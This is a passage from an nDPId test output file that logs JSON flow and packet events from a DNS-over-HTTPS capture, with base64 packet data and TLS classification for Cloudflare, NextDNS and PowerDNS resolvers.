4s131JOS1nhPpDpOs1W8FqhOijP5pChk7nVfwQ9Bu1xYiYmTlZWYP4bC0IhVSltsY4+ff
d9etk6QNu1u5Seoh1QaWRe4DU8GYPqDdj9ywHuBnTu\/kdk6yObRcYizbhLyG5JiQSyxA9bv7iPMzOSI\/oPD6Rw4c6cy1qJywZ7F9o\/W7KUU6pYYhqWRcunfBOy2cedxZtVaWxcAQGD7VjEr1GjI\/ndJEL6DV\/vUO5PSsHgdX\/GScVrZdS\/KHwHxAHOv1BpKxNHl+ElIeVfCJc4tBsNkoBf5+COT0BV1cqDq\/0TqIcpVxlMv3\/7JDTZZTI\/wMxcbTZkEC580\/OL4P7o7ZBv1lVciiiGUxirK0Wn0VmKVkOPUH1VVDEVtxbspQjAQAudOqLnKMivdYYnLWKcLFjjfuE8XwFn1JkF2YyGgtdu+0wxe7V3QdQyeX6wSKDfGOBn1RHTiZSQJLrjf\/MjK6PK6+6dmcX2K\/Nos\/HKCWzOCSGOxH6pgvl94s\/0dDawx7iAmW0aKHP7fN\/Qsuj7qBRlYmeX3wDSe3ACAyO8PJtifBKRUnx+i44zF\/TEZT9\/0f9hj1yXYZhM4IttxvCtS3N7k187lM2JB6HB4DmePSpA5UfxEPRq71lNWUsDLAAiN3ekJSKoZ7PUpp\/6SJsuSwyITjf4EqBLpeWL9MrWeNXoUk5W1F7hWZmXxUwbc9PMEuirTVJUIeKJcMT3hUo1x6K9jQ+3H\/3FjLuAvSaGN20\/JlmWzUhH2c19MbTsBdNUca8p5h9ftAYWxNZFi+BPME56GacRIjusosOaDm6TM6NIeJtcd5nQ0Y6NbfwEe7MdB0akdNH1SZ5FpPCUXE+5h9eWmGzxT6gCZx6qvA46+kjmSPa8Cj85dDYPgUItxPMDzQDmcDkFl4Jtoqp7CsVbgDs2FaRSNSCg+ZMEThJQx0\/Aqz+vGM8Axcf5cpBgdqJqmkgft7WVM6LgxM0bWa6ReLOTbftdrjvt51qS7oW8iSFCaAMyVHnB9nNub1rCB71JGnHgmpLaDriPHmvZHyXG+tF3YYxqKFpVLMzSELDqif9S44Mrb9ZjnIWKvGQryM\/QSKoEg5X7zctl4vxNBFap6BlJhqRr3fm7FAc37N2CcUPqfx3Q8d+odOusP4Ls3Xq2Sur1UmBSNW9zqMAV9eCaagN4swiO+HX9D1JhZPxXTW9QWyDXi2zI1HI7LUB70fqeJS7u5T5BooNTQeoNzZVCvWOXWLt+ZiIbxI46okrDHFQXi\/x2G\/UqXdfkOEinNyh78FxOnrKcOtvfU1vQdaz7Z3d1S6XTGxIbp7Avs8yqCBkfYYx0okhQoRYkFViIAKhs8EJ22ENemkpy\/xMNRrY7HXIqAF0plC7ASy6aRPBxNQLpe6Ed5IaeUHDV+pWuEiLAgXAO3BIyMmN+dKwyJRSjGew81SAxYCXzqNGK2p7GdpO\/XP0maghqEG1aIROtTBX2ArldnERnpk4NXjDbfgsSkzP20ClfXeN4yjZTmAjINRHsDFyBG2kVPsbWM6bJ6sXUqNBkjHzH8mUguB01CThNReqO2rGsLiKr5qTMAwxKxjfEdoEJ+OdtfVMDr3B0PaBDiW6NDXICwJTMjrTiHsqLMySrS2T3BXPc1yBL+jDROuKYyhTZQzCA6ktzSKC6wAMC\/2RMbHnV4JUqSuJoXnZI1jiGQfafDh9qm0ZR91\/Upntxs\/kWZ9Zofn9x4gsvGL94XY2stn+kYJ+lpR5T38ZBRBOsXu8bAGsKAP+3wt7PlEML8VYdMSv1Y8XhaZ4vQZT4mxjokM8a+\/vbBm5OFXEOAsw3UpeMp5Pdlywdfks9xANyyHcs7XyT+4nzRjV93W+RbJVksh761\/0CsogB0Bf4AeRq1b8bSy2mVWD\/C9oBFlc4PSw+jhx1uKdorr8amCiJ2bwSUXaBBKYKGtf3eKS0Vrr8DWhAzmAupA8TRMiBwDgWH\/pSpuuBxo4fKT36lTdVMpKIp966xzVRYeAdyJ8dQTy5jeDQL1o\/K9FAvaIxIHdqy3Ai9Up
xdTmYwoZXk1RGWSFQPWK2eEqydFLHkwLiG2A9OQ8pCYrZlqHUn1snev7fQAbwrXFOXDJskS+CYp+0GQvu\/Fu37N\/vYvDe9yQ2BjQyb\/Aq\/mNLHkdVzTu+oIIX6og2jNse2SlImfdMuiBssQFePUieOP3nrkgegmZDkJvZU8\/IJtyIPGhvEr4wy0KRjmbk1R5TV1oh+Gvyump800hgoeZ6yINLishVXjkSrZbw30TzgVyIHMXbfVH5cMb\/otpjX8v74ViZ68NiQoVQGCiu9Qccb9jITaHI7YqId83HAhD0Mgcvql8x4riVhsLhWBp7KARZMNylg6FCWQzYhkomLcDqOeaHr\/i3Kucv0p5GzUzkUvhbOyyBarVy1r5EY3Ff\/LeERfwiWeu9JMjSlW9a76FWzNvpbjiVQvAXjpJS+B6vW0S676\/2F\/QVlBvmv\/1e3jfE46NEORC\/KvStAu1+NCVXXkgYYjYaavSuMFqEVMBLpNt3pqmD175kYHYjG6R6TDv0nmjRk\/fdkSOg4ydMi2g43e05SDICPCTBrKL+H8pdmtKEp3WxofXZCtNR+ckTvaTdfJXZMWJbImpAgp0edudixTNqo9z3f5BRBQ1U170EzzThEQIMmS6RHUG4MBWpfatZDm+5s5WqxzAc+f48z+5\/Rjpm1MjT7FAj2QOS2mS1pZuw8jR7f9mlmDHlYUa7yULFKz+EOcDFjny+TGuKCw6tBmvp0uAgOgbWkR3PGwLQlgJNN5qcasz\/DdlRFFRc1kdK872NuK41RPGMSa34kfvjKckPj3jn4ntsF1i9WcRtXZaTKddZmAVoibh8F7o+\/2BqWfWHshjLjbv2UXOWt85MGeIvvR+JAZ4lQKxhMp4ApqHsqTnv9vjAIsk+AJwp0L3kf96BrAf5lxFwLByeiu2ScazZunSG5IvLxJ2cCZzgYOFm\/xSZPCmFYvKNJw727A0qH0cpDBKVk4Z5vvRen3ROFERblATF0imHD72RVGcQ\/rMrcnTAneuS+605QxQwV5cyssndlHujOT5cJjQwi4Me+A9i\/U+gGMItbvzyiV\/bH\/dnSH\/6+REX1pIGyZTP+9n2MXLAZnibrKAMIRfK2TIfrOe5jmJF94vcBm\/\/5ycPeTZII89RYTOm\/OYD7dCL\/Fj+p2ZF9GMMq1KmH\/crTCIqHICoTep9ezhaM3lurJnltFyZNv3oliEoTfl"} +00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":343,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739380697,"flow_last_seen":946739380725,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2838,"flow_tot_l4_payload_len":3126,"flow_avg_l4_payload_len":1563,"midstream":1,"thread_ts_msec":946739380725,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"dns.cloudflare.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":946739380727,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739380727,"pkt":"REREREREZmZmZmZmCABFAABosgVAAH4GiM0KAAABAQAAAdIqAbvH6z9rSWN0\/1AYAfXCFwAAFAMDAAEBFwMDADVke5XeBLKUZMMwsdywo3cwWM6dcwvPxEIBrrKuQwAVECVGBCt8L\/1vmMSczXlzhvKSsbEzJA=="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380870,"flow_last_seen":946739380870,"flow_idle_time":7560000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739380870,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":946739380870,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"thread_ts_msec":946739380870,"pkt":"REREREREZmZmZmZmCABFAAFEC7lAAH4G5eQKAAABLVocAII6AbvzwYfFjc3Z3lAYAfYLTQAAFgMBARcBAAETAwME0sG+tMqbxpRl1DV8Z2dnX5LfzpIiHTt74xC1bVbZqCBq5Am0FD9Ax\/Z0hd9jpGF+x36pK3fx2LqXRJeDdYghvgAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACkAAAAEwARAAAOZG5zLm5leHRkbnMuaW8ABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAghy6XniNnPGDj9u0r7tzchu6tmfTKqCDkZge3YRdGMjI="} +00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380870,"flow_last_seen":946739380870,"flow_idle_time":7560000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739380870,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.nextdns.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+02432{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":946739380903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739380903,"pkt":"ZmZmZmZmRERERERECABFAAXUAxlAADQGM\/UtWhwACgAAAQG7gjqNzdne88GI4VAQAnmV4AAAFgMDAHoCAAB2AwNSUVDmrRSBFJr3VlpPTiOBfna69z7Ip3AgaZ4JY8XZPCBq5Am0FD9Ax\/Z0hd9jpGF+x36pK3fx2LqXRJeDdYghvhMBAAAuACsAAgMEADMAJAAdACBgLhCqxZDxBYT0wty93r8WAtFFYd34UV+f0SYd9yF0RxQDAwABARcDAwAgNdJG6I7V9ce0uN\/W8MyCm58pWjfsCFZXXJnMcWaU4P8XAwMJ4l4xzn1tklFeMfXUSkilkOHkR2CrV0Fk61C4hUjayiVX3XCUzF\/nVmk3NsjsUuGQs+ELPFl7aLMJpdeipyb\/BRKM7DDOdlmSjSZFpz3sI+4Ap1vb842GKpbBCp1KIgOgnmXfMMwnL4uKzNN2+XpL8V9LwuMNROahwk9tJrSx3BZQnvVy5qktKVugzkoTSb9fPpFovSjkUbQUBQuFWl2cxLyQBO6gjWiaDBpgoqREkqW2UGurTHpBXCvX7xTK+SGfs3VLNGPL\/jM509wXezmGXrBZolGpSBcCmwqP5AGjSUkJQ2KFF8\/5I5DLe1rWw\/7rCzdCJgW7dwItPpQigYvEpUhaTQyjzhLtXm4Br1gtr+Iuf0HPHYTCtm1Z9061ijlO7AesYAg3NSX4lpTeBeQNzqwAGQi0kxU+8BsfAI4uhNY4fwD\/tgZRm00kCDUGr0Hw1O0\/9wcQo2OrT4hVI8sBPv9rovACUd1xTXQBUu4c2UNVQr\/DAwgtr3oGHXN\/yf6hHksHqaO6ThyUELGPZgyTaAEJeYSlV\/UuFXosuXrXk+4M4bQmtm8xQA\/hPEgZw03CxD+XIQ9CziCJc2Lx3r4h2FdBiMwzohldpvHSBUXM2GuHl07Muv9yz1FfyzqYAimU2llIffa6XcR6\/N9ex4PCYrVYeRifJmT\/hN608lQ56Pm4ckRgIW72lS0ILwL91eG\/PWLw1TWr9OHqib8dqID1N28WvnDQAc1WG+OfvFA5Lx7KtiZ9\/3KI7f7RCYG\/5anpOjN3Yvo+yrHT\/\/9yxTpA2EDhXmw1I+drMKCfdVXEwoRqrQDXQ3qu16NE+piWO4zYtxH6MrZOf5GKUoqj85zhZkJ6n3Wtdfmw0p2w7uWnPZarz2kRT1hGv0H7uWAwQsIO2witiCTCAX0VhCKqX5eg9HlVQxEJ8e6aZG6udk28L+hlu2DjHm2cK3LT5siYCZ+61rOCmuWYzAzB4PZwDYNVRnV0GsHgMCnZc9N4\/ighhHZqiYL81av1zekzo7Qcc39eQmJB1\/vhuqI4+c3vKnv7ROdK1hsAX7hP\/VFs8H8ZF9FxFv36aFuAu1HQxIxhZTCwXDQcu5TzVx1PL5uguNjR7pwef7T5COi4aTCL27yji1k+uS4xQgf7uM7lfjr7UlwSz76e6z\/NdrgDABxN2pYomW51+xON8iXDOy0cXgxInpylLI6lmV7hJWGh+rssjjMTkzOSia\/tb6HN8MDXz8ND7qC4wdRBL+K2XXzk7CxXSZKHbU7oBKE3VuTcSRmB
vFAj4jzbuAW9nVI5Yw9M7KxJ0oNCiAer+7rkuV1\/dCwQt\/7\/zkSRGAemKSurrkjoqozLCUcuNRu2YlaJLAc\/PeEJmeHXWSos8ReOKG9libwm6aBbFjBhBGqk11oBFxYMJe3fE8zx0cKng5v141kUW5K8KykDBQPlm38itlnDfJBFaB9Jn9F1Dk+fc1GMvxAKNX1KD189yDAOfdy35szVs+4vU19xgaD3Asb+3zoIgGeHaF3v5zAsODf1V7zFmYGD1A5VyodE+SZcg8yBGqWdCjN6Dq7+yW5n4whEBATh9+W8PK0m19STC9EnY\/KFQ8CMbZglLaqGH9UHLlwuaNZUfgFyrj24dAMianUUp6I5pp2CbweoDVXgQfGbkHcfYC\/73I2CAYRQxi4XFXP\/UJ7vD4Iv633KLKMEpQYwdikhrjOP"} +00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":359,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739380870,"flow_last_seen":946739380903,"flow_idle_time":7560000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1736,"flow_avg_l4_payload_len":868,"midstream":1,"thread_ts_msec":946739380903,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.nextdns.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+02374{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":946739380903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1467,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1467,"pkt_l4_len":1433,"thread_ts_msec":946739380903,"pkt":"ZmZmZmZmRERERERECABFAAWtAxpAADQGNBstWhwACgAAAQG7gjqNzd+K88GI4VAYAnlzfQAACEkFkdj1Us7HE6XsQGxneQX\/pTaXJNHBzTBwjbjFH2PSLY9gxHervwko9HwLHhkgWdiRotlJENzv3dIlV0Q25g7GanzLzAoq\/bJLnF1bxRf0nf8R7xwqHIiEyWrnrfJqukts8v3m8MMBnkDAGd5xOmtynEVhFSJmjPZeWlanPH3W\/gPE9eVpcr\/bC8aD31d4wHJftv6KUYCRDzDXbCSoL\/6F7bgfENCEavhYW2LuID8zVPN+yKzb3WDD71Bfm\/QzlUMFQuZM5HbG0c7uIAOOAxkawVYPNiqL2TFCk1ynXFgmF4gXvbL\/HYrDLFRfjW4de\/NkjjSai08L+PfACua2q5oTvt2qGJPeolVEHsMmZEjEwazNhDwGqFKG5OP+F531r01cH7BTJcZ05QE7qXBrbvqwdtdoGPvG50ZEjeoenLq9i4bYfhTR7gqdrp+nT5HdXBlwZ3BA7TNBvRO28EIkDbwnbkKR1uAOgeHpmVvBpmpiphn4DYQZvVFKBDcAp0CgnjFhQ7BpU5nrco2WQPx+1Dj+wVwuk8wQg4nsuaxF9uoh5BJPTUJDd+oGcKzJnMyQnjiAungCkABFhOHccfPCI4WdjBjLMLNqgoxHw6DJHYylEKtOB9OnnXDF2J7Jvo9Dz26D1KrzmXsDWoLDC1fC96J8yd93fYvTZHskQxfY50BQIAKcBIdr8K4+MowCcaLlKXgQ2BvySvU9B5mJVdaqmTLF1fzesL+WRRK51q7IAwLh77wssc7jt76mm0H3PAWysYvmp\/NCiSKfjKaaLkm9x2NoEkekjBVCT4zJZaY12lyFWkBUvQQdolUu\/1tiRf86EnZ+MpspCpIhymi\/IUp68M\/Eb+2ljNKVmV1Er+pytZKFdhm+LxFZQDgPvwZts5tJVArrKTXEX7mbMUyNCFK87rJIQtF3h75H2QQdF8Dne8XAGsXDDnswycmS8W4DR2ei8Mvw6EchukCH49+5iX+zWw8yLNfbuXrdtwpsTWibehpgDGJwJ32GJ3PUhcT2O8ckRkT01hA4OhJ5s8FVi9G4sK5PSDUaW\/FVD5mXCOlbG6fI8ep93Cq318IKEa9gHWkRIcGP1KNeJ0vqPt6W+fiprWcAT+y38\/pHS\/DIldwWXxoakgp8kEgE10+BHsdUGoLtM0vHARs9JoXziCU\/gwCe4xJoYT7yIuKPLoyyOJzupzLZV+Yx6GthfYTU5x9FRZbuuSu\/4e+BWK3Ph42jg8FFm3MjO7iYnNl4v1+ChQKVR7XODNZWDH3jwqcZ8qhbkD9u5SI6j\/BA1C0rUPcBjh1+6XjoNgW\/MuFBBpUx0b9PcVFriOAhMdQziZ17xbnHnF7nwzD4ltsyPw098+Y62NYg0g7ZzmYgr7Bp\/OQu72rrzto9ZurPdNMKCU\/kuUSQfJNRXnpCKpphgwF89PQmt81ZhzDDg8jGUYjA+eCwP5b5c3W1mHz2rbpTYaJ5WAEPawg7kcD\/0daljt7SoSzY0j1SW+z8PqelVSwUwhQf5v+d
UBJntKDTvIA8dd3\/P5RebSAS6fwWCMpEa2Wpe0EbiTKfmmwomuAMmkjN4HlloVMdOTeEonHISxyYlgXipaeXT8CPFbuFXE4ejDU2aTkR9\/ZIbgoZdx7IXmaK+NxS9KICVTe0LPka0QmobSr15yArkyNHaP1EjswXAwMAYdZTBGnK4vcmbufHHRKWT+kPKyQO98Boq8AW86\/7q3c0DIh4T2TuGPAeaW+ueW75g7BJBBU7YuGFvnEEgi07qTSBXDL1UISZX8PwWOHA6mln36hZp5MmWU+JESIy2cQgYeQXAwMANQq+Suu4\/zFTPT1s4z\/CUiKzLUAWytPdwzfRZmXCp50PDxLOSYvzo75EbO+96Njs+ccRggY7"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":376,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385090,"flow_last_seen":946739385090,"flow_idle_time":7560000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739385090,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":946739385090,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":946739385090,"pkt":"REREREREZmZmZmZmCABFAAFGrgFAAH4GLMUKAAABiJDXnsvQAbv3Oz1sep96IVAYAfYiJAAAFgMBARkBAAEVAwNZtcLiAhjzwZoFuSzepzhVh3+I+642bR2Bdc1go+HJvyB94\/ND5pNfeKEuu8RDLRRLZQtcZUnz37DmCj0UC1geOAAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACmAAAAFQATAAAQZG9oLnBvd2VyZG5zLm9yZwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACBPoxVI1tXnUcUqsbORFpVub7e\/4DvFTpQM4hnCin1UEw=="} 
+00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385090,"flow_last_seen":946739385090,"flow_idle_time":7560000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739385090,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.powerdns.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +04676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":946739385124,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":3170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3170,"pkt_l4_len":3136,"thread_ts_msec":946739385124,"pkt":"ZmZmZmZmRERERERECABFAAxUg1ZAADcGk2KIkNeeCgAAAQG7y9B6n3oh9zs+ilAYAO0tMgAAFgMDAHoCAAB2AwNC32Ly6HNyagXW\/50d2q6qJAOmShuP86HMxipBKzBmwCB94\/ND5pNfeKEuu8RDLRRLZQtcZUnz37DmCj0UC1geOBMCAAAuACsAAgMEADMAJAAdACBiVzglBWvQOWIt\/inusfkCbeAeDbm6AiXUcYUQ0SeUdBQDAwABARcDAwAgVY3jrnTrJkAawm+Mv8gBTn6zfdywiZ3PkfSROpmIxNoXAwMKFapXpMK700YralL2NJ+2AqPfCUAacni3qdcZUnufsXl31+F2NSHowZS8bEZc4wYIOhESfjBH81NgZUBCJL0cGqDMG7c\/GafBLHylsDncbVfIqhYnumIxgnBjMekzN4Jr3Pc5g1dWYk4XIPvLeMa1AeLFQqOY+unh1DHuo4FV4KfjYjnh7ERuvhffEbloWyMHFdAQi8p2J65FwIVJHxtFX6hmaEMmHATlFHHOx1RIGQmbmA5r5k0vgPGiuUMBe1e8Ay6+kNyhTTutV32hMuU4\/4gl06pCrT6iDU4Fx4eNT+Bo6E12QIKo042tC7Wn8Kl\/KILiC4TaY1uTO0+LE4wVqs5DJHWwykde\/Mpu9moeLZ0VhV6Rnx2ocHW4rcz
n9gPX5qTiTrDgHO7CKCVp0Yo86Aw2suyeRkNR6Pz2DTuex3RC6JD+6hKlKYjQfx6kO1r8jKEZ8UZCGU+Rw2Pd2IT\/whiiT5Kf7zLPm28Fu5xYAFYob+TbRXBcQ0z8XUJIWzCMQvkjyj\/EBbyfhm8Iz194guweTL19Y3Q2XO+NnAUm9ihjSHpRimJ0Ale\/24shK7Q0gI7NtX4Sy93vR61pN+Zbul9p4+Mos8cFPIfYJPR5DmxNv9L\/cWnYOwtiE8KnRSAYR+6q3d\/0S6rIgkskZa1GGNAffeDtgnD5SVrh+YhdzCWZCb6834ULGghfWcw8DVqJTSeWttzs5JvcUzLfaxv2WQHaWCXuUpmCZy6HgKkW3jxYYWr2tyqizXXXq732dtVhz4LWmL9EHS1WzONzEhrNFQDtpAQ95k9MRPEdXjg0bNse0lpUI4AUqhIkxWgs0j+8YRzV3BBFFrpEwA3Ylhpo+Wbg8IG0hFyThCaHTvj0vN5WKh94GQCSIjO11AtJoS9k0tl5NWJ7dp2n0NCYI25hp41FivaF\/BBZqFxHTd\/4w8k1KmIQOky6ICw7WRykbaqxzUboD5Bq7peIuOsiwZoUMD+BDbF\/3fE\/CVHWoaOcr09A0PaL0PLhUDjARYyrR4LsVfpqkH4CZh+5Jr1aOIJ+zgcH7Gme4o7fpj5Ml+hu\/y+kOOZZN5J0XdtmvZE5w20Osrk+W9YsiLIeYNt9SB2i7LEsIRfsOrVhh9XsJ8\/VF+0Pp0BTxOsC+9Ft0\/Qj6hgm17CCVsOwdD0VhkUWaus1O+o2PGnC8v4FL3kFyyqT6BtubEcffH1AbvnEid+VZXXjMTJvMB6eWAs+UqpOrNnkCEZAK35TZ0tRUT\/0MJ65M3rSS8cnt+LL4apIWh9CenPODN35ZvH8b3XA1lwJHej3o7w4KZBEvRoLt8OxNNvwpgMfHbFpXZIqbODt95v1PnTJxwC\/vTEturbRIFjRNgt+KCX3zfwvULi6DBxiqBmChwECudELdgYVXSzaQF56hOrspt7m7cSP\/bSuhLgvGoeM7hRIXBgEFXWWobiqWKLPkIiUnd3zKygePoMYOZHF1u2D1V4jxKHpRJ6c0k9v9f8PV1\/2cqY\/66gHBBbRV41oC7rjWm5aIoPFQPYH0PovphDScGBnJ6jwAMRZhEh8stnUD5D9slPJ\/emP0c\/PTpb6PEHZyu0Q7qMTKM1bbEpBCcvYFzyVsCvmHuicyOKAs3xMxmCmWm4Eqf7griGXbNKYrhS8laSwuwkSEnXVtwhIr1b+a3aGOTQNdzJzZMKbJeIH1FS5VDDqACuwzlpn2\/PpEcmP5h\/q7H0tPqDs+gUGEHDMancSkknkDjnO8AWIHrv7XSmAw8MzBpM2IwCdCuY2dZXBowy6lZV\/inUY7ZvvXtbP6a8QnD\/\/IUygRpu63NQLm4VeKCFEprpn1cgwz5cL4vjrW8z1Oy+wINHvxXqkotg8FbTmtoSQdi7m2\/uaxkwXGvCE+Ey\/VyskJtt+1lkVPt6gqRb1ZVRQm9DD0JoMxHNgFOAaDrB+WFlvX4dGQvQzwATgRC8IKAuMZ8oKSe0p8HpA+6MvWjcmzVE8kVy6HlIQ+H75lU+B2jVUeDC7BKjayT8YnFAN9VHJiYBcwsc6cBByDnSSlpjY95o1fVD\/OvMoqArUx2Avc07VIGr\/MqkoiuFsBZpt7HMy13Sks4rLBRM4blbz1tgnQW4V9XKGhwXXv\/r\/C7JzoFDKo1O5LL2d9NrS47Pk6pIUPyJaZQjYfdcqsgSPEYWloR+Ff71Pv2pzjT7Sxhw7YViV\/havSqMuVAeVNrx2FMlZ7\/Bjxt5t67OkjvVTbouDt\/zCvvPnjRGuWwfp0n7UEFUPBk0VQxxGTP46k14fFISL3DGCnaRmvSrBlk9oDA6joQ7sLe2wbd3yp\/7JTFG1yDws5hd9oSrDxTaFhT45Qw3wjaIXqpHrD
